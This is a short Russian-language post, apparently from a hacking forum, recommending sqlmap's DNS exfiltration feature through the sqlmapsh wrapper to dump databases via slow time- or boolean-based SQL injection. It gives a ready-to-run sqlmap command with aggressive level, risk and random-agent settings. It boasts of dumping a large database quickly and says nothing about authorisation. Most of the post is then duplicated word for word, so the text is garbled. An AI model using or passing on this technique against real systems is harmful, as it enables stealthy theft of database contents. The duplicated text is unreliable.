Здарова, недавно наткнулся на очень интересный параметр sqlmap, а именно - --dns-domain. Сразу побежал гуглить, и узнал, что оказывается sqlmap дает возможность производить эксфильтрацию данных через dns.
Т.е. мапа буквально отправлять данные из таблиц на ваш dns сервер.
Я тестировал на практике это только на Windows Server, но результат был прекрасным. Мапа сдампила очень большую базу за рекордно короткое время.
Таким советую пользоваться, если у вас есть медленная (time, boolean) скуля. Ниже приведу гайд, как все настроить.
1) Скачиванием приложение на go - https://github.com/unlock-security/sqlmapsh
2) Запускаем его так же как вы запускаете обычную мапу, вписывая те же параметры за исключением самого названия sqlmap, его мы меняем на sudo sqlmapsh.
Пример: sudo sqlmapsh -r ~/request --level=3 --risk=3 --random-agent -v 3 --batch --dbs --technique=T
Приложение автоматически настроит ваш днс сервер через interactsh.
Т.е. мапа буквально отправлять данные из таблиц на ваш dns сервер.
Я тестировал на практике это только на Windows Server, но результат был прекрасным. Мапа сдампила очень большую базу за рекордно короткое время.
Таким советую пользоваться, если у вас есть медленная (time, boolean) скуля. Ниже приведу гайд, как все настроить.
1) Скачиванием приложение на go - https://github.com/unlock-security/sqlmapsh
2) Запускаем его так же как вы запускаете обычную мапу, вписывая те же параметры за исключением самого названия sqlmap, его мы меняем на sudo sqlmapsh.
Пример: sudo sqlmapsh -r ~/request --level=3 --risk=3 --random-agent -v 3 --batch --dbs --technique=T
Приложение автоматически настроит ваш днс сервер через interactsh.
